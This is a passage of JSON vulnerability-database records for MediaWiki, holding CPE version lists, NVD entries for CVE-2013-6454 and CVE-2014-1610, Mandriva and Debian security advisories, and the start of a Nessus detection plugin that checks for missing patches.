"cpe:2.3:a:mediawiki:mediawiki:1.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta4:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta4:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta3:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via a -o-link attribute.", "edition": 5, "cvss3": {}, "published": "2014-05-12T14:55:00", "title": "CVE-2013-6454", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6454"], "modified": "2014-05-13T14:21:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2013-6454", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6454", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:01:14", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/media/DjVu.php; (2) the w parameter (aka width field) to thumb.php, which is not properly handled by includes/media/PdfHandler_body.php; and possibly unspecified vectors in (3) includes/media/Bitmap.php and (4) includes/media/ImageHandler.php.", "edition": 3, "cvss3": {}, "published": "2014-01-30T23:55:00", "title": "CVE-2014-1610", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2016-05-25T15:01:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.21.4", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2014-1610", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1610", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6451"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:057\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : mediawiki\r\n Date : March 13, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated mediawiki packages fix multiple vulnerabilities:\r\n \r\n MediaWiki user Michael M reported that the fix for CVE-2013-4568\r\n allowed insertion of escaped CSS values which could pass the CSS\r\n validation checks, resulting in XSS (CVE-2013-6451).\r\n \r\n Chris from RationalWiki reported that SVG files could be uploaded\r\n that include external stylesheets, which could lead to XSS when an\r\n XSL was used to include JavaScript (CVE-2013-6452).\r\n \r\n During internal review, it was discovered that MediaWiki's SVG\r\n sanitization could be bypassed when the XML was considered invalid\r\n (CVE-2013-6453).\r\n \r\n During internal review, it was discovered that MediaWiki displayed some\r\n information about deleted pages in the log API, enhanced RecentChanges,\r\n and user watchlists (CVE-2013-6472).\r\n \r\n Netanel Rubin from Check Point discovered a remote code execution\r\n vulnerability in MediaWiki's thumbnail generation for DjVu\r\n files. Internal review also discovered similar logic in the PdfHandler\r\n extension, which could be exploited in a similar way (CVE-2014-1610).\r\n \r\n MediaWiki before 1.22.3 does not block unsafe namespaces, such as a\r\n W3C XHTML namespace, in uploaded SVG files. Some client software may\r\n use these namespaces in a way that results in XSS. This was fixed\r\n by disallowing uploading SVG files using non-whitelisted namespaces\r\n (CVE-2014-2242).\r\n \r\n MediaWiki before 1.22.3 performs token comparison that may be\r\n vulnerable to timing attacks. This was fixed by making token\r\n comparison use constant time (CVE-2014-2243).\r\n \r\n MediaWiki before 1.22.3 could allow an attacker to perform XSS attacks,\r\n due to flaw with link handling in api.php. This was fixed such that\r\n it won't find links in the middle of api.php links (CVE-2014-2244).\r\n \r\n MediaWiki has been updated to version 1.22.3, which fixes these issues,\r\n as well as several others.\r\n \r\n Also, the mediawiki-ldapauthentication and mediawiki-math extensions\r\n have been updated to newer versions that are compatible with MediaWiki\r\n 1.22.\r\n \r\n Additionally, the mediawiki-graphviz extension has been obsoleted,\r\n due to the fact that it is unmaintained upstream and is vulnerable\r\n to cross-site scripting attacks.\r\n \r\n Note: if you were using the instances feature in these packages to\r\n support multiple wiki instances, this feature has now been removed.\r\n You will need to maintain separate wiki instances manually.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6451\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6452\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6453\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6472\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2242\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2243\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2244\r\n http://advisories.mageia.org/MGASA-2014-0113.html\r\n http://advisories.mageia.org/MGASA-2014-0124.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 0763c6b913556fd3d098e14e6711d4c9 mbs1/x86_64/mediawiki-1.22.3-1.mbs1.noarch.rpm\r\n 3f3d638b7a09dfc700a56f06a0e06629 mbs1/x86_64/mediawiki-ldapauthentication-2.0f-1.mbs1.noarch.rpm\r\n c1bdd7ff8e5ab29f74891cb4fa92bff0 mbs1/x86_64/mediawiki-mysql-1.22.3-1.mbs1.noarch.rpm\r\n 6cd761769b330e837612ed079816019f mbs1/x86_64/mediawiki-pgsql-1.22.3-1.mbs1.noarch.rpm\r\n e484574d3776723c87e46a832daf3c4a mbs1/x86_64/mediawiki-sqlite-1.22.3-1.mbs1.noarch.rpm \r\n 870886ea628aaac381b4ab4210e33ea0 mbs1/SRPMS/mediawiki-1.22.3-1.mbs1.src.rpm\r\n bfbd6cc7fb3ce82be5c01564c5bfddde mbs1/SRPMS/mediawiki-ldapauthentication-2.0f-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFTIZKGmqjQ0CJFipgRAjIFAKCLVeGKatrjL2G/cYBZKCkekZ+BrgCdGfjO\r\naivXRBBXbumCTNMTeujkTrc=\r\n=5vFM\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-05T00:00:00", "published": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30625", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30625", "title": "[ MDVSA-2014:057 ] mediawiki", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7295"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3046-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nOctober 05, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mediawiki\r\nCVE ID : CVE-2014-7295\r\n\r\nIt was reported that MediaWiki, a website engine for collaborative work,\r\nallowed to load user-created CSS on pages where user-created JavaScript\r\nis not allowed. A wiki user could be tricked into performing actions by\r\nmanipulating the interface from CSS, or JavaScript code being executed\r\nfrom CSS, on security-wise sensitive pages like Special:Preferences and\r\nSpecial:UserLogin. This update removes the separation of CSS and\r\nJavaScript module allowance.\r\n\r\nFor the stable distribution (wheezy), this problem has been fixed in\r\nversion 1:1.19.20+dfsg-0+deb7u1.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1:1.19.20+dfsg-1.\r\n\r\nWe recommend that you upgrade your mediawiki packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJUMWQQAAoJEAVMuPMTQ89EIFEP/jGfYxU9UQ4JBoIu84wsRjuP\r\nMXI7mGNuhA9dnwxKaAzEddqlmVrVy5tgP18kanlB1agzBR3O7JWqel8BjAWWU3wV\r\nLIRTrlTQTh3EFeXuaPAKUrXPHognDcixhcPUNsVn6oeuwNaHDI7T9cQseDKlnvPU\r\nVtVexVVE6YpPyUg3LIO6EPt1U3dVLr6AG8/BbweooYwQyB3tupbemGWptI6rEeRK\r\nMqIxRuld3xkAG7SZJXv7pLnRDZBzXW/LcRD5r7CtSdfUeIFqcMOBhMR2lWH52jMg\r\n0jM3koPnukXOYPOQIYD+l3+wG65mPqb/gtToRObPqGgcPCTup0eMcWu97Nz9CUDp\r\nQW2iTo/M9e+4T+uAg5ETeWiK0i3k6R7MpcSBJuTv2ckbDvqZKvslzLjLXJ4MsheD\r\nmbv0gmub3wDojWLwYq8+PAsCJSaGFZhZqME2aFps0xxqFQVo03JULZZK/hbIjFgl\r\nGpXH+Exb7iAuCiZM+tSgMe/GJ324J53qudKaifDbypaLWZLT4T1WN24IHZv6Icpv\r\nW08Em5Guc0nyC4mYFb9+J+t/yXd6M3hfhc1I+9fqdX+uLFlvx/nNm8wU87QuuQs/\r\nk64awl9aUDbZxDGdC8OxwDfh1EeXroNMHueDPj82t76+dRU3+sBjJkhnQMp3S/LD\r\nRMJttMX597NHP2RBLApx\r\n=KdNC\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31179", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31179", "title": "[SECURITY] [DSA 3046-1] mediawiki security update", "type": "securityvulns", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-07T11:54:34", "description": "Updated mediawiki packages fix multiple vulnerabilities :\n\nMediaWiki user Michael M reported that the fix for CVE-2013-4568\nallowed insertion of escaped CSS values which could pass the CSS\nvalidation checks, resulting in XSS (CVE-2013-6451).\n\nChris from RationalWiki reported that SVG files could be uploaded that\ninclude external stylesheets, which could lead to XSS when an XSL was\nused to include JavaScript (CVE-2013-6452).\n\nDuring internal review, it was discovered that MediaWiki's SVG\nsanitization could be bypassed when the XML was considered invalid\n(CVE-2013-6453).\n\nDuring internal review, it was discovered that MediaWiki displayed\nsome information about deleted pages in the log API, enhanced\nRecentChanges, and user watchlists (CVE-2013-6472).\n\nNetanel Rubin from Check Point discovered a remote code execution\nvulnerability in MediaWiki's thumbnail generation for DjVu files.\nInternal review also discovered similar logic in the PdfHandler\nextension, which could be exploited in a similar way (CVE-2014-1610).\n\nMediaWiki before 1.22.3 does not block unsafe namespaces, such as a\nW3C XHTML namespace, in uploaded SVG files. Some client software may\nuse these namespaces in a way that results in XSS. This was fixed by\ndisallowing uploading SVG files using non-whitelisted namespaces\n(CVE-2014-2242).\n\nMediaWiki before 1.22.3 performs token comparison that may be\nvulnerable to timing attacks. This was fixed by making token\ncomparison use constant time (CVE-2014-2243).\n\nMediaWiki before 1.22.3 could allow an attacker to perform XSS\nattacks, due to flaw with link handling in api.php. This was fixed\nsuch that it won't find links in the middle of api.php links\n(CVE-2014-2244).\n\nMediaWiki has been updated to version 1.22.3, which fixes these\nissues, as well as several others.\n\nAlso, the mediawiki-ldapauthentication and mediawiki-math extensions\nhave been updated to newer versions that are compatible with MediaWiki\n1.22.\n\nAdditionally, the mediawiki-graphviz extension has been obsoleted, due\nto the fact that it is unmaintained upstream and is vulnerable to\ncross-site scripting attacks.\n\nNote: if you were using the instances feature in these packages to\nsupport multiple wiki instances, this feature has now been removed.\nYou will need to maintain separate wiki instances manually.", "edition": 25, "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6451"], "modified": "2014-03-14T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:mediawiki-pgsql", "p-cpe:/a:mandriva:linux:mediawiki-mysql", "p-cpe:/a:mandriva:linux:mediawiki-ldapauthentication", "p-cpe:/a:mandriva:linux:mediawiki-sqlite", "p-cpe:/a:mandriva:linux:mediawiki"], "id": "MANDRIVA_MDVSA-2014-057.NASL", "href": "https://www.tenable.com/plugins/nessus/73004", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:057. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73004);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\");\n script_bugtraq_id(65003, 65223, 65883, 65906, 65910);\n script_xref(name:\"MDVSA\", value:\"2014:057\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mediawiki packages fix multiple vulnerabilities :\n\nMediaWiki user Michael M reported that the fix for CVE-2013-4568\nallowed insertion of escaped CSS values which could pass the CSS\nvalidation checks, resulting in XSS (CVE-2013-6451).\n\nChris from RationalWiki reported that SVG files could be uploaded that\ninclude external stylesheets, which could lead to XSS when an XSL was\nused to include JavaScript (CVE-2013-6452).\n\nDuring internal review, it was discovered that MediaWiki's SVG\nsanitization could be bypassed when the XML was considered invalid\n(CVE-2013-6453).\n\nDuring internal review, it was discovered that MediaWiki displayed\nsome information about deleted pages in the log API, enhanced\nRecentChanges, and user watchlists (CVE-2013-6472).\n\nNetanel Rubin from Check Point discovered a remote code execution\nvulnerability in MediaWiki's thumbnail generation for DjVu files.\nInternal 